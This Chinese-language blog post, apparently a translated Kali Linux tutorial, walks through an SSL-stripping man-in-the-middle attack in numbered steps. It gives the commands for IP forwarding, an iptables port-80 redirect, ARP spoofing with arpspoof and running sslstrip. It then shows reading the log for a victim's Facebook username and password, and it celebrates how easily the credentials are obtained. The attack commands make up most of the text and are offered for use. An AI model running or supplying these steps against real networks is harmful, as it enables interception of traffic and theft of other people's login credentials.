记录黑客技术中优秀的内容, 传播黑客文化,分享黑客技术精华

利用sslstrip对HTTPS连接发起中间人攻击

2018-11-06 12:20

利用SSLStrip发起中间人攻击可以透明地劫持网络中的http流量,查找HTTPS链接并重定向,然后将这些链接映射到类似的HTTP链接中或者同形的HTTPS链接。

它还支持提供类似锁定图标,选择性日志记录和拒绝会话的模式。

step1

首先我们将设备设置为转发模式,这样我们的设备就可以转发目标不是我们设备的数据包。

echo 1>/proc/sys/net/ipv4/ip_forward

step2

还需要设置iptables,将流量从80端口重定向到8080端口,确保出站连接发送到sslstrip中。

iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 8080

step3

需要找到我们的网关

route -n

前三步如图所示

2.jpg

step4

接下来我们需要找到目标主机的IP地址

3.jpg 

step5

攻击者利用ARP欺骗技术将虚假的ARP消息发送到局域网中。

arpspoof -i -t

4.jpg

step6

现在我们打开一个新的终端并监听8080端口,命令如下

sslstrip -l 8080

5.jpg

step7

现在我们转到受害主机中,并且在浏览器中输入facebook.com,我们知道Facebook本来是使用的HTTPS协议,但是这里我们看到与Facebook是通过http建立的连接。

6.jpg

step8

现在,返回到家目录,查看sslstrip.log日志文件,我们可以看到受害者登录时输入的用户名和密码,如图:

7.jpg

就是这么easy,我们就拿到了受害者的凭证。

更多kali Linux教程,请参考:

· Lynis—开源安全审计工具详解

· sqlmap-检测和利用SQL注入详解

· HPING3—网络扫描器-包生成器

本文翻译自:https://gbhackers.com/mitm-attack-https-connection-ssl-strip/如若转载,请注明原文地址: http://www.hackdig.com/11/hack-53426.htm
知识来源: www.4hou.com/tools/14295.html

阅读:66839 | 评论:0 | 标签:安全工具 MITM sslstrip

想收藏或者和大家分享这篇好文章→复制链接地址

“利用sslstrip对HTTPS连接发起中间人攻击”共有0条留言

发表评论

姓名:

邮箱:

网址:

验证码:

公告

关注公众号hackdig,学习最新黑客技术

推广

工具

标签云

本页关键词